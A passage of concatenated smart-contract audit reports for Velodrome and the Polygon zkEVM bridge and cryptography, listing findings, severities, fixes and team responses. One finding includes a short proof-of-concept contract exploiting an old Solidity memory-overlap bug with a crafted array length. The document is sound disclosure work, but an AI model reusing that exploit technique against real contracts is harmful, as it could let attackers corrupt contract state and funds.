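        uint256[] memory amounts = router.getAmountsOut(amountIn, routes);
        return amounts[amounts.length - 1]; // output amount of the final hop
    }

    function pickBestRoute(
        IRouterLike.Route[] memory optimizerRoute,
        IRouterLike.Route[] memory callerRoute,
        uint256 amountIn
    ) public view returns (IRouterLike.Route[] memory best) {
        // The caller's suggestion is used only when it strictly beats the
        // optimizer's candidate, so a bad suggestion can never make the
        // resulting swap worse.
        best = _quote(callerRoute, amountIn) > _quote(optimizerRoute, amountIn)
            ? callerRoute
            : optimizerRoute;
    }
}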
Recommendation: One possible solution to this problem would be to implement a way for the caller to pass a suggested optimal route, which can then be compared against other routes.
Velodrome: Acknowledged.
Spearbit: Acknowledged.
+6.6.4 Check if owner exists in split function
Severity: Informational
Context: VotingEscrow.sol#L955
Description: In case the NFT does not exist, the _ownerOf(_from) function returns the zero address, and this check is satisfied if canSplit has been toggled. However, this does not lead to any issues because the _isApprovedOrOwner() check will revert as intended, and there is no amount in the lock. It may be a good idea to update the _ownerOf() function to revert if there is no owner for the NFT.
Recommendation: It is recommended to check that the owner is different from address(0):

function split(
    uint256 _from,
    uint256 _amount
) external nonReentrant returns (uint256 _tokenId1, uint256 _tokenId2) {
    address sender = _msgSender();
    address owner = _ownerOf(_from);
+   if (owner == address(0)) revert SplitNoOwner();
    if (!canSplit[owner] && !canSplit[address(0)]) revert SplitNotAllowed();
    ...
}

Velodrome: Implemented commit 197c8d.
Spearbit: Fixed.
+6.6.5 Velo and Veto Governor do not use MetaTX Context
Severity: Informational
Context: Velo.sol#LL5C67-L5C68
Description: These two contracts use Context instead of ERC2771Context.
Recommendation: At this time I'd recommend not changing the code; Velo can still be moved via permit, which is effectively the same as allowing metaTXs.
Velodrome: Acknowledged.
Spearbit: Acknowledged.
+6.6.6 SinkManager is depositing to Gauge without using the TokenId
Severity: Informational
Context: SinkManager.sol#L238
Description: gauge.deposit allows specifying a tokenId, but the field is unused.
Recommendation: I believe a nofix is completely fine.
Velodrome: Acknowledged. There is no risk in leaving the argument empty. The v1 gauge takes in the tokenId argument (Gauge.sol#L457) only to populate the tokenIds mapping within the Gauge (which is never utilized) and ensure the gauge is alive via voter.attachTokenToGauge() (which it will be). Will leave as-is.
Spearbit: Acknowledged.
diff --git a/findings_newupdate/spearbit/zkEVM-Cryptography-Spearbit-27-March.txt b/findings_newupdate/spearbit/zkEVM-Cryptography-Spearbit-27-March.txt new file mode 100644 index 0000000..00356cf --- /dev/null +++ b/findings_newupdate/spearbit/zkEVM-Cryptography-Spearbit-27-March.txt @@ -0,0 +1,7 @@
+4.1.1 Documents Reviewed
• PIL – Polynomial Identity Language (PIL): A Machine Description Language for Verifiable Computation – v1.0, February 13, 2023
• eSTARK – eSTARK: Extending the STARK Protocol with Arguments – v1.0, February 10, 2023 – v1.2, March 15, 2023
• Recursion – Recursion, aggregation, and composition of proofs – v1.0, February 13, 2023
• fflonk – fflonk: a Fast-Fourier inspired verifier efficient version of PlonK – ePrint Archive – Polygon Documentation (February 20, 2023)
+4.1.2 PIL + eSTARK
Definition of Connection argument is inconsistent between the PIL and eSTARK v1.0 documents (Informational) The connection argument in Section 1.5 of eSTARK is meant to be identical to Section 1.9, Definition 4 of the PIL document (labeled Multi-Column Copy-Satisfiability). However, Section 1.9, Definition 3 (labeled Connection Argument) refers to the Single-Column variant.
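For orientation only (the notation below is ours, not taken verbatim from either document), one standard way to state the multi-column variant is:

% Sketch of multi-column copy-satisfiability; our notation, for orientation.
Let $f_1,\dots,f_k : G \to \mathbb{F}$ be columns over a domain $G$, and let
$T$ be a partition of $[k] \times G$. The columns are copy-satisfying with
respect to $T$ iff the combined map $f(i,g) := f_i(g)$ is constant on every
set of $T$; equivalently, for a permutation $\sigma$ of $[k] \times G$ whose
cycles are exactly the sets of $T$,
\[
  f_i(g) = f_j(h) \quad \text{whenever } \sigma(i,g) = (j,h).
\]
The single-column variant is the case $k = 1$.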
• Suggestion: In the PIL documentation, label Definition 3 to be the Single-Column Connection Argument, and specify in the eSTARK documentation in Section 1.5 the description of the Multi-Column Connection Argument.

Definition of Connection argument in eSTARK v1.0 contains inconsistent definition of partition (Inconsistency) The connection argument in Section 1.5 of the eSTARK document defines a partition T = {T1, ..., Tk}. This implies that T1, ..., Tk are partition sets. However, there is no need to limit the number of partition sets to k. As described in Section 1.4, Definition 4 of the PIL document, the number of columns can (and usually will) differ from the number of partition sets. We believe this might be the result of a mix-up of the partition sets and the vectors that will be used to encode the partition permutation. The number of vectors encoding the partition permutation is the same as the number of columns.
• Concern Addressed: The Polygon team has addressed this concern with version eSTARK v1.2.

Unconstrained selectors in selection variants of lookup and multiset equality arguments (Minor) In Section 2.4 of the eSTARK document v1.0, step 1 states that the prover sends over the selector polynomials. There are two potential issues here:
1. If the verifier does not take in the selector polynomials as constant (preprocessed) polynomials, then the relation is trivially satisfiable. The prover can simply set the selectors to be identically 0. Thus, the Selected Vector Argument is meaningless.
2. Further, beyond the trivial satisfying selection described above, if the prover is meant to send their own selectors, there is no verification check to confirm the image of the selector polynomials over G is {0,1}.
• Suggestion: A self-contained description of the Selected Vector Argument should include a verification check that the selector polynomials lie in {0,1} over G.
• Concern Addressed: The Polygon team informed us that in the zkEVM context, additional constraints exist to ensure the selector polynomials are in {0,1} when they are prover-provided, i.e., they are the result of a lookup from a preprocessed table that only contains {0,1}.

Misuse of Poseidon hashing for verifier challenges resulting in unexploitable length-extension weakness (Minor) In Section 2.2 of the eSTARK documentation v1.0, the strategy to produce a third verifier challenge from the 7th, 8th, and 9th field elements requires producing a new set of 8 field elements (the 9th field element is not contained in the previous set). To do this, 8 zeroes are hashed with the previous capacity. This approach produces the same outputs as if hashing the message appended with 8 zeroes: M||00000000.
• Suggestion: While this particular instance of misuse as used in the STARK prover may not cause issues, as the inputs to the transcript may not be length-extended, we recommend that additional verifier challenges are produced by treating the Poseidon hash function as an XOF for continuous variable-length output. Feed the full 12 elements (capacity + output) into another round of the Poseidon permutation, then use the top 8 (without the capacity) as partial output, repeating as needed. This mimics the squeeze operation of a sponge hash function.

Using Poseidon with XOF mode allows for producing as many verifier challenges as needed (Optimization) A number of design decisions are made in eSTARK v1.0 to bound the number of verifier challenges needed.
We do not believe there are any concerns with the soundness of the proposed design decisions; however, if these design decisions were made due to concern around the feasibility of generating additional verifier challenges, then this can be avoided. If instead reducing the number of verifier challenges is already an optimization to reduce the size of the STARK verifier in the recursion, then the following can be ignored.
1. Section 2.2 of the eSTARK documentation v1.0 claims that there is a bound on the number of verifier challenges that can be produced.
2. Section 2.5 of the eSTARK documentation v1.0 claims that the large number of verifier challenges needed to produce the quotient polynomial is hard to produce.
3. Section 2.7 of the eSTARK documentation v1.0 claims that the large number of verifier challenges needed to produce the FRI polynomial is an issue.
• Suggestion: None of the above is an issue when using the XOF mode with Poseidon as described above.
• Concern Addressed: The Polygon team confirmed that the proposed designs to reduce the number of verifier challenges were not because of a perceived infeasibility of producing more verifier challenges; rather, it is an optimization to minimize the recursive circuit, avoiding additional encodings of Poseidon rounds.

Preprocessed polynomials not included in first prover message (Informational) In the description of the full protocol in Section 4.5, Round 1 of the eSTARK paper v1.2, the preprocessed polynomials are not included in the Merkle tree commitment.
• Suggestion: Include the preprocessed polynomials in the first prover message as described in earlier sections.
+4.1.3 Recursion
Description of rootC used and depicted inconsistently (Inconsistency) In Section 4.2.6 of the recursion document, in Figure 17, the public input rootC is supposed to be multiplexed with a hard-coded rec1 rootC. The paragraph before has some description mistakes.
• Suggestion: Follow the diagram from Jordi's slides that includes the hard-coded rootC and input rootC as arguments to the multiplexor fed to both verifiers.
+4.1.4 fflonk
Minor soundness bound error (Informational) There is an off-by-one error in the soundness bound for the proof of Lemma 6.4. Note that $A \mid (p-1)$, where $p$ is the size of $\mathbb{F}$. The set $S$ of $A$-th powers of $\mathbb{F}$ includes $0$; thus $|S| = \frac{p-1}{A} + 1$. Let $F_i$ be a non-zero polynomial. For a uniformly chosen element $s$ in $S$,
\[
  \Pr[F_i(s) = 0] \;\le\; \frac{\deg(F_i)}{\frac{p-1}{A} + 1} \;<\; \frac{\deg(F_i) \cdot A}{p-1}.
\]
4.2 Code Review
+4.2.1 Scope of Code Review
Code Reviewed
1. Recursion pipeline
• Repository: zkevm-proverjs at branch v0.8.0.0-rc.2-forkid.2
• Build documentation
• The generated STARK verifiers in the recursion pipeline for c12a, rec1, rec2, recf, and fflonk.
2. STARK prover and verifier for PIL
• Repository: pil-stark
• Files: stark_gen, stark_setup, stark_verify, starkinfo, starkinfo_cp_prover, starkinfo_cp_verifier, starkinfo_fri_prover, starkinfo_fri_verifier, starkinfo_step1, starkinfo_step2, transcript
• The STARK proof generation and verification code for a given PIL description, including encoding of lookup, multiset equality, and connection arguments.
Future Code Reviews
While the scope of the broader zkEVM security review included a complete code review of all cryptography-related parts of the zkEVM, the code review of the following parts has not been done yet (at the time this report was written) but will be completed in the near future.
1. Compilation of PIL file to data structure input to STARK prover
• Repository: pilcom
2. Encoding of PIL-derived STARK verifier to circom
3. Encoding of circom-produced R1CS to PlonK-like PIL
4. FRI (batched) polynomial commitment and opening
+4.2.2 Recursion Pipeline
Following the latest build documentation provided, we built zkevm-proverjs on branch v0.8.0.0-rc.2-forkid.2. We checked that all the circom files aligned with our analysis of the recursion pipeline as described in the recursion documentation. Additionally, we reviewed the final fflonk verifier in Solidity.

Build and documentation mismatch (Minor) The final.fflonk.verifier.sol produced by zkevm-proverjs on branch v0.8.0.0-rc.2-forkid.2 uses an outdated template from snarkjs before this commit. This outdated template does not appropriately calculate verifier challenges (it does not include preprocessed polynomials and does not keep a continuous transcript state). Further, the documentation provided in the README is outdated.
• Suggestion: The Polygon team should double-check that the release version of zkevm-proverjs uses the updated template; otherwise the produced fflonk verifier may have Fiat-Shamir vulnerabilities.
• Suggestion: Use the updated documentation provided by Felicia.
• Concern Addressed: The Polygon team confirmed that they are using the correct version in their release build pipeline.

Batch number comparison logic overflow (Minor) In the recursive2 circuit, a mux is used to select whether a hardcoded root or public input root is passed into the subverifier circuits. In the recursivef circuit, a mux is used to select which of two hardcoded roots is passed to the subverifier. Both muxes take in as input a comparison of the form:

component test = IsZero();
test.in <== oldBatchNum - newBatchNum - 1;
....
mux.s <== test.out;

Since the bn128 scalar field is larger than the goldilocks field, there is a potential for overflows to occur in the field arithmetic above. This would affect the comparison logic above, which is meant to be done over the goldilocks field.
• Example: Let p be the order of the larger bn128 scalar field, and let q be the order of the goldilocks field. Note p > q, as the bn128 field is much larger than the goldilocks field. Define integers a and b and consider the expressions a·q + b and b. Then a·q + b ≡ b (mod q), yet a·q + b ≠ b as integers. If oldBatchNum is b − 1 and newBatchNum is a·q + b, then the comparison above would return true despite the batch numbers not being adjacent. The prover could convince a verifier that they have done a·q + 1 iterations of work by using a valid final proof of an execution from b − 1 to b.
• Concern Addressed: The Polygon team stated that in final.verifier.circom they do a bit decomposition of oldBatchNum and newBatchNum into 63 bits. Since 2^63 < q (the order of the goldilocks field), overflow in the comparison logic cannot occur.

Minor completeness issue by rejecting the point-at-infinity during on-curve checks (Informational) Valid points on the curve bn128 either satisfy the curve equation or are the point at infinity. In the precompiled contracts (EIP196), (0,0) is the encoding of the point-at-infinity. The checkPointBelongsToBN128Curve function returns true only if the point satisfies the curve equation; it rejects the point-at-infinity. There exist valid scenarios where a prover message is identical to the point-at-infinity.
• Suggestion: Add the point-at-infinity check to the on-curve check.
• Concern Addressed: The Polygon team would like to avoid adding the point-at-infinity case to the on-curve check.
We have confirmed that, due to the random blinding factors and random verifier challenges in the protocol, completeness would only be an issue with negligible probability for an honest prover.
+4.2.3 STARK Prover and Verifier
We checked the implementation of the STARK prover and verifier and the generation of the starkinfo object from the parsed PIL object. We verified that the STARK prover follows the design of the reviewed eSTARK protocol, in particular the implementation of the newly added lookup, multiset equality, and connection arguments.

Misuse of Poseidon hashing for verifier challenges (Minor) We repeat the issue raised during the cryptography review above. It is present in transcript (lines 16-20). The suggestion and addressed concern are the same.

Unnecessary inclusion of all committed polynomials in FRI polynomial (Optimization) When the prover computes the FRI polynomial in starkinfo_fri_prover (lines 12-19), all committed polynomials are included in the linear combination. All committed polynomials that are involved in constraints will already be included in the linear combination as part of the proof of their correct evaluation, which attests to the degree bound for the committed polynomial. Thus, the only benefit of adding all committed polynomials to the linear combination is to include a degree bound check for polynomials that are not part of any constraints.
• Suggestion: Committed polynomials can be removed from the linear combination computing the FRI polynomial. If for some reason it is important to check the degree bound of some committed polynomial that is not included in any constraints, then at the very least, all committed polynomials that are a part of constraints do not need to be included a second time.

Unnecessary evaluation of vanishing polynomial in verifier (Optimization) The verifier evaluates the vanishing polynomial of G on g·z, where g is the generator of G and z is the verifier evaluation challenge. However, this evaluation is not needed for verification. The evaluation is in stark_verify (line 70).
• Suggestion: Remove this evaluation.
diff --git a/findings_newupdate/spearbit/zkEVM-bridge-Spearbit-27-March.txt b/findings_newupdate/spearbit/zkEVM-bridge-Spearbit-27-March.txt new file mode 100644 index 0000000..2feade2 --- /dev/null +++ b/findings_newupdate/spearbit/zkEVM-bridge-Spearbit-27-March.txt @@ -0,0 +1,73 @@
+6.3.3 L2 deployment
+6.3.4 Findings
1 About Spearbit
Spearbit is a decentralized network of expert security engineers offering reviews and other security-related services to Web3 projects with the goal of creating a stronger ecosystem. Our network has experience on every part of the blockchain technology stack, including but not limited to protocol design, smart contracts and the Solidity compiler. Spearbit brings in untapped security talent by enabling expert freelance auditors seeking flexibility to work on interesting projects together. Learn more about us at spearbit.com
2 Introduction
Smart contract implementation which will be used by the Polygon-Hermez zkEVM.
Disclaimer: This security review does not guarantee against a hack. It is a snapshot in time of zkEVM-Contracts according to the specific commit. Any modifications to the code will require a new security review.
3 Risk classification

Severity level    Likelihood: high   Likelihood: medium   Likelihood: low
Impact: High      Critical           High                 Medium
Impact: Medium    High               Medium               Low
Impact: Low       Medium             Low                  Low

3.1 Impact
• High - leads to a loss of a significant portion (>10%) of assets in the protocol, or significant harm to a majority of users.
• Medium - global losses <10% or losses to only a subset of users, but still unacceptable.
• Low - losses will be annoying but bearable; applies to things like griefing attacks that can be easily repaired or even gas inefficiencies.
3.2 Likelihood
• High - almost certain to happen, easy to perform, or not easy but highly incentivized.
• Medium - only conditionally possible or incentivized, but still relatively likely.
• Low - requires stars to align, or little-to-no incentive.
3.3 Action required for severity levels
• Critical - Must fix as soon as possible (if already deployed)
• High - Must fix (before deployment if not already deployed)
• Medium - Should fix
• Low - Could fix
4 Executive Summary
Over the course of 13 days in total, Polygon engaged with Spearbit to review the zkevm-contracts protocol. In this period of time a total of 68 issues were found.

Summary
Project Name: Polygon
Repository: zkevm-contracts
Commit: 5de59e...f899
Type of Project: Cross Chain, Bridge
Audit Timeline: Jan 9 - Jan 25
Two week fix period: Jan 25 - Feb 8

Severity             Count   Fixed   Acknowledged
Critical Risk        0       0       0
High Risk            0       0       0
Medium Risk          3       3       0
Low Risk             16      10      6
Gas Optimizations    19      18      1
Informational        30      19      11
Total Issues Found   68      50      18

5 Findings
5.1 Medium Risk
+5.1.1 Funds can be sent to a non existing destination
Severity: Medium Risk
Context: PolygonZkEVMBridge.sol#L129-L257
Description: The functions bridgeAsset() and bridgeMessage() do check that the destination network is different than the current network. However, they don't check whether the destination network exists. If the wrong networkId is accidentally given as a parameter, the funds are sent to a nonexisting network. If that network were deployed in the future, the funds could be recovered; in the meantime, however, they are inaccessible and thus lost for the sender and recipient. Note: other bridges usually have validity checks on the destination.

function bridgeAsset(...) ... {
    require(destinationNetwork != networkID, ... );
    ...
}

function bridgeMessage(...) ... {
    require(destinationNetwork != networkID, ... );
    ...
}

Recommendation: Check that the destination networkID is a valid destination.
Polygon-Hermez: Solved in PR 88.
Spearbit: Verified.
+5.1.2 Fee on transfer tokens
Severity: Medium Risk
Context: PolygonZkEVMBridge.sol#L171
Description: The bridge contract will not work properly with fee-on-transfer tokens:
1. User A bridges a fee-on-transfer Token A from Mainnet to Rollup R1 for amount X.
2. In that case X - fees will be received by the bridge contract on Mainnet, but a deposit receipt for the full amount X will be stored in the Merkle tree.
3. The amount is claimed in R1, a new TokenPair for Token A is generated, and the full amount X is minted to User A.
4. Now the full amount is bridged back again to Mainnet.
5. When a claim is made on Mainnet, the contract tries to transfer amount X, but since it only received X - fees it will use funds from other users, which eventually causes a DoS for other users using the same token.
Recommendation: Use the exact amount that was transferred to the contract, which can be obtained using the sample code below:

uint256 balanceBefore = IERC20Upgradeable(token).balanceOf(address(this));
IERC20Upgradeable(token).safeTransferFrom(address(msg.sender), address(this), amount);
uint256 balanceAfter = IERC20Upgradeable(token).balanceOf(address(this));
uint256 transferedAmount = balanceAfter - balanceBefore;
// if you don't want to support fee on transfer tokens use below:
require(transferedAmount == amount, ...);
// use transferedAmount if you want to support fee on transfer tokens

Polygon-Hermez: Solved in PR 87. To protect against reentrancy with ERC777 tokens, a check for reentrancy MUST be added. Solved in PR 91.
Spearbit: Verified.
+5.1.3 Function consolidatePendingState() can be executed during emergency state
Severity: Medium Risk
Context: PolygonZkEVM.sol#L783-L793
Description: The function consolidatePendingState() can be executed by everyone, even when the contract is in an emergency state. This might interfere with cleaning up the emergency. Most other functions are disallowed during an emergency state.

function consolidatePendingState(uint64 pendingStateNum) public {
    if (msg.sender != trustedAggregator) {
        require(isPendingStateConsolidable(pendingStateNum),...);
    }
    _consolidatePendingState(pendingStateNum);
}

Recommendation: Consider adding the following, which also improves consistency:

function consolidatePendingState(uint64 pendingStateNum) public {
    if (msg.sender != trustedAggregator) {
+       require(!isEmergencyState,...);
        require(isPendingStateConsolidable(pendingStateNum),...);
    }
    _consolidatePendingState(pendingStateNum);
}

Polygon-Hermez: Solved in PR 87.
Spearbit: Verified.
5.2 Low Risk
+5.2.1 Sequencers can re-order forced and non-forced batches
Severity: Low Risk
Context: PolygonZkEVM.sol#L409-L533
Description: Sequencers have a certain degree of control over how non-forced and forced batches are ordered. Consider the case where we have two sets of batches: non-forced (NF) and forced (F). A sequencer can order the sets of batches (F1, F2) and (NF1, NF2) in any interleaving, as long as the internal order of the forced and non-forced batch sets is kept. I.e., a sequencer can sequence batches as F1 -> NF1 -> NF2 -> F2, but they can also equivalently sequence these same batches as NF1 -> F1 -> F2 -> NF2.
Recommendation: Ensure this behavior is understood and consider what impact decentralizing the sequencer role would have on bridge users.
Polygon-Hermez: Added comments to function forceBatch() in PR 85.
Spearbit: Acknowledged.
+5.2.2 Check length of smtProof
Severity: Low Risk
Context: DepositContract.sol#L90-L112
Description: An obscure Solidity bug could be triggered via a call in Solidity 0.4.x; current Solidity versions revert with panic 0x41. The problem could occur if unbounded memory arrays were used. This happens to be the case, as verifyMerkleProof() (and all the functions that call it) doesn't check the length of the array (or loop over the entire array). It also depends on memory variables (for example structs) being used in the functions, which doesn't seem to be the case here.
Here is a POC of the issue which can be run in Remix:

// SPDX-License-Identifier: MIT
// based on https://github.com/paradigm-operations/paradigm-ctf-2021/blob/master/swap/private/Exploit.sol
pragma solidity ^0.4.24; // only works with low solidity version
import "hardhat/console.sol";

contract test {
    struct Overlap {
        uint field0;
    }

    function mint(uint[] memory amounts) public {
        Overlap memory v;
        console.log("before: ", amounts[0]);
        v.field0 = 567;
        console.log("after: ", amounts[0]); // would expect to be 0 however is 567
    }

    function go() public { // this part requires the low solidity version
        bytes memory payload = abi.encodeWithSelector(this.mint.selector, 0x20, 2**251);
        bool success = address(this).call(payload);
        console.log(success);
    }
}

Recommendation: Although it currently isn't exploitable, to be sure consider adding a check on the length of smtProof:

function verifyMerkleProof(..., bytes32[] memory smtProof, ...) public pure returns (bool) {
+   require(smtProof.length == _DEPOSIT_CONTRACT_TREE_DEPTH);
    ...
}

Or use a fixed-size array:

function verifyMerkleProof(..., bytes32[_DEPOSIT_CONTRACT_TREE_DEPTH] memory smtProof, ...) ... {
}

Polygon-Hermez: Solved in PR 85.
Spearbit: Verified.
+5.2.3 Transaction delay due to free claimAsset() transactions
Severity: Low Risk
Context: batchbuilder.go#L29-L122
Description: The sequencer first processes the free claimAsset() transactions and then the rest. This might delay other transactions if there are many free claimAsset() transactions. As these transactions would have to be initiated on the mainnet, the gas costs there will reduce this problem. However, once multiple rollups are supported in the future, the transactions could originate from another rollup with low gas costs.

func (s *Sequencer) tryToProcessTx(ctx context.Context, ticker *time.Ticker) {
    ...
    appendedClaimsTxsAmount := s.appendPendingTxs(ctx, true, 0, getTxsLimit, ticker) // `claimAsset()` transactions
    appendedTxsAmount := s.appendPendingTxs(ctx, false, minGasPrice.Uint64(), getTxsLimit-appendedClaimsTxsAmount, ticker) + appendedClaimsTxsAmount
    ...
}

Recommendation: Consider allowing only a limited number of free claimAsset() transactions per batch.
Polygon-Hermez: This is important to consider once multiple rollups are implemented. For now, we'll let it be like this.
Spearbit: Acknowledged.
+5.2.4 Misleading token addresses
Severity: Low Risk
Context: PolygonZkEVMBridge.sol#L272-L373
Description: The function claimAsset() deploys TokenWrapped contracts via create2 and a salt. This salt is based on the originTokenAddress. By crafting specific originTokenAddresses, it's possible to create vanity addresses on the other chain. These addresses could be similar to legitimate tokens and might mislead users. Note: it is also possible to directly deploy tokens on the other chain with vanity addresses (e.g. without using the bridge).

function claimAsset(...) ... {
    ...
    bytes32 tokenInfoHash = keccak256(abi.encodePacked(originNetwork, originTokenAddress));
    ...
    TokenWrapped newWrappedToken = (new TokenWrapped){ salt: tokenInfoHash }(name, symbol, decimals);
    ...
}

Recommendation: Have a way for users to determine legitimate bridged tokens, for example via tokenlists.
Polygon-Hermez: Our front end will show a list of supported tokens, and users will also be able to import custom tokens (the same way it happens in a lot of DEXs). But of course we cannot control the use of all the dapps deployed.
Dapps that integrate with our system should be able to import our token list or calculate the addresses. There are view functions to help calculate an L2 address (precalculatedWrapperAddress) given a mainnet token address and metadata. A user/dapp can also easily check the corresponding L1 token address of every L2 token by calling wrappedTokenToTokenInfo and checking, for example, that originTokenAddress is in their Mainnet token list.
Spearbit: Acknowledged.
+5.2.5 Limit amount of gas for free claimAsset() transactions
Severity: Low Risk
Context: PolygonZkEVMBridge.sol#L272-L436
Description: Function claimAsset() is subsidized (e.g. gasprice is 0) on L2 and allows calling a custom contract. This could be misused to execute elaborate transactions for free. Note: safeTransfer could also call a custom contract that has been crafted before and bridged to L1. Note: this is implemented in the Go code, which detects transactions to the bridge with bridgeClaimMethodSignature == "0x7b6323c1", the selector of claimAsset(). See function IsClaimTx() in transaction.go.

function claimAsset(...) ... {
    ...
    (bool success, ) = destinationAddress.call{value: amount}(new bytes(0));
    ...
    IERC20Upgradeable(originTokenAddress).safeTransfer(destinationAddress, amount);
    ...
}

Recommendation: Limit the amount of gas supplied to claimAsset() when executing free transactions. Note: a PR is being made to limit the available gas: PR 1551.
Polygon-Hermez: We will take this into consideration in the current and future implementation of the sequencer.
Spearbit: Acknowledged.
+5.2.6 What to do with funds that can't be delivered
Severity: Low Risk
Context: PolygonZkEVMBridge.sol#L272-L436
Description: Both claimAsset() and claimMessage() might revert in different locations (even after retrying). Although the funds stay in the bridge, they are not accessible by the originator or recipient of the bridge action, so they are essentially lost for both. Some other bridges have recovery addresses where the funds can be delivered instead. Here are several potential revert situations:

function claimAsset(...) ... {
    ...
    (bool success, ) = destinationAddress.call{value: amount}(new bytes(0));
    require(success, ... );
    ...
    IERC20Upgradeable(originTokenAddress).safeTransfer(destinationAddress, amount);
    ...
    TokenWrapped newWrappedToken = (new TokenWrapped){ salt: tokenInfoHash }(name, symbol, decimals);
    ...
}

function claimMessage(...) ... {
    ...
    (bool success, ) = destinationAddress.call{value: amount}(
        abi.encodeCall(
            IBridgeMessageReceiver.onMessageReceived,
            (originAddress, originNetwork, metadata)
        )
    );
    require(success, "PolygonZkEVMBridge::claimMessage: Message failed");
    ...
}

Recommendation: Consider having a recovery mechanism for funds that can't be delivered. For example, the funds could be delivered to an EOA recovery address on the destination chain.
This requires adding more info to the merkle root and also checking that senders supply a recovery address; otherwise, there isn't always a recovery address. It could be implemented via a function (e.g. recoverAsset()) where the recovery address initiates a transaction (similar to claimAsset()) and the funds are delivered to the recovery address.
Polygon-Hermez: We decided that such a mechanism is not worth implementing, since the user can also put an invalid recovery address and it adds too much overhead. If the user puts an invalid destination address, whether by mistake or by supplying a smart contract that cannot receive funds, the funds will be lost.
Spearbit: Acknowledged.
+5.2.7 Inheritance structure does not openly support contract upgrades
Severity: Low Risk
Context: PolygonZkEVMBridge.sol#L18-L21
Description: The Solidity compiler uses C3 linearisation to determine the order of contract inheritance. This is performed left to right over all child contracts before considering the parent contract. Storage slot assignment for PolygonZkEVMBridge is as follows: Initializable -> DepositContract -> EmergencyManager -> PolygonZkEVMBridge. Initializable.sol already reserves storage slots for future upgrades, and because PolygonZkEVMBridge.sol is inherited last, storage slots can be safely appended. However, the two intermediate contracts, DepositContract.sol and EmergencyManager.sol, cannot handle storage upgrades.
Recommendation: Consider introducing a storage gap to the two intermediate contracts.
Polygon-Hermez: Solved in PR 88.
Spearbit: Verified.
+5.2.8 Function calculateRewardPerBatch() could divide by 0
Severity: Low Risk
Context: PolygonZkEVM.sol#L1488-L1498
Description: The function calculateRewardPerBatch() does a division by totalBatchesToVerify. If there are currently no batches to verify, then totalBatchesToVerify would be 0 and the transaction would revert. When calculateRewardPerBatch() is called from _verifyBatches() this doesn't happen, as it will revert earlier. However, when the function is called externally, this situation could occur.

function calculateRewardPerBatch() public view returns (uint256) {
    ...
    uint256 totalBatchesToVerify = ((lastForceBatch - lastForceBatchSequenced) + lastBatchSequenced) - getLastVerifiedBatch();
    return currentBalance / totalBatchesToVerify;
}

Recommendation: Consider changing the code to something like:

function calculateRewardPerBatch() public view returns (uint256) {
    ...
    uint256 totalBatchesToVerify = ((lastForceBatch - lastForceBatchSequenced) + lastBatchSequenced) - getLastVerifiedBatch();
+   if (totalBatchesToVerify == 0) return 0;
    return currentBalance / totalBatchesToVerify;
}

Polygon-Hermez: Solved in PR 88.
Spearbit: Verified.
+5.2.9 Limit gas usage of _updateBatchFee()
Severity: Low Risk
Context: PolygonZkEVM.sol#L839-L908
Description: The function _updateBatchFee() loops through all unverified batches. Normally this would be 30 min / 5 min ~ 6 batches. Assume the aggregator malfunctions and, after one week, verifyBatches() is called, which calls _updateBatchFee(). Then there could be 7 * 24 * 60 min / 5 min ~ 2016 batches. The function verifyBatches() limits this to MAX_VERIFY_BATCHES == 1000. This might result in an out-of-gas error, which would possibly require multiple verifyBatches() tries with a smaller number of batches and thus increase the network outage.

function _updateBatchFee(uint64 newLastVerifiedBatch) internal {
    ...
    while (currentBatch != currentLastVerifiedBatch) {
        ...
        if (block.timestamp - currentSequencedBatchData.sequencedTimestamp > veryBatchTimeTarget) {
            ...
        }
        ...
    }
    ...
}

Recommendation: Optimize the function _updateBatchFee() and/or check the available amount of gas, and simplify the algorithm that updates the batchFee. As suggested by the project, the following optimization could be made. This alleviates the problem because only a limited number of batches will be below target; the bulk will be above target, but they won't be looped over.

// Check if timestamp is above or below the VERIFY_BATCH_TIME_TARGET
if (
    block.timestamp - currentSequencedBatchData.sequencedTimestamp <  // Notice the changed <
    veryBatchTimeTarget
) {
    totalBatchesBelowTarget +=  // Notice now it's Below
        currentBatch - currentSequencedBatchData.previousLastBatchSequenced;
} else {
    break; // Since the rest of the batches will be above!
}

Polygon-Hermez: Solved in PR 90.
Spearbit: Verified.
+5.2.10 Keep precision in _updateBatchFee()
Severity: Low Risk
Context: PolygonZkEVM.sol#L839-L908
Description: Function _updateBatchFee() uses a trick to prevent losing precision in the calculation of accDivisor. The value accDivisor includes an extra multiplication by batchFee, which is undone when doing batchFee = (batchFee * batchFee) / accDivisor, because this also contains an extra multiplication by batchFee. However, if batchFee happens to reach a small value (also see issue "Minimum and maximum value for batchFee"), the trick doesn't work that well. In the extreme case of batchFee == 0, a division by 0 would take place, resulting in a revert; luckily this doesn't happen in practice.

function _updateBatchFee(uint64 newLastVerifiedBatch) internal {
    ...
    uint256 accDivisor = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3));
    batchFee = (batchFee * batchFee) / accDivisor;
    ...
}

Recommendation: Replace the multiplication factor with a fixed and sufficiently large value, for example in the following way:

function _updateBatchFee(uint64 newLastVerifiedBatch) internal {
    ...
-   uint256 accDivisor = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3));
-   batchFee = (batchFee * batchFee) / accDivisor;
+   uint256 accDivisor = (1E18 * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3));
+   batchFee = (1E18 * batchFee) / accDivisor;
    ...
}

Polygon-Hermez: Solved in PR 90.
Spearbit: Verified.
+5.2.11 Minimum and maximum value for batchFee
Severity: Low Risk
Context: PolygonZkEVM.sol#L839-L908
Description: Function _updateBatchFee() updates the batchFee depending on the batch time target. If the batch times are repeatedly below or above the target, the batchFee could shrink or grow without limit. If the batchFee got too low, problems with the economic incentives might arise; if it got too high, overflows might occur, and the fee might be too high to be practically payable. Although not very likely to occur in practice, it is probably worth the trouble to implement limits.

function _updateBatchFee(uint64 newLastVerifiedBatch) internal {
    ...
    if (totalBatchesBelowTarget < totalBatchesAboveTarget) {
        ...
        batchFee = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3));
    } else {
        ...
        uint256 accDivisor = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3));
        batchFee = (batchFee * batchFee) / accDivisor;
    }
}

Recommendation: Consider implementing a minimum and maximum value for batchFee; a sketch of such bounds follows.
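As an illustration only, a minimal sketch of such bounds; the constant names and concrete values are assumptions (real values would come from economic analysis), not taken from the codebase:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

abstract contract BatchFeeBoundsSketch {
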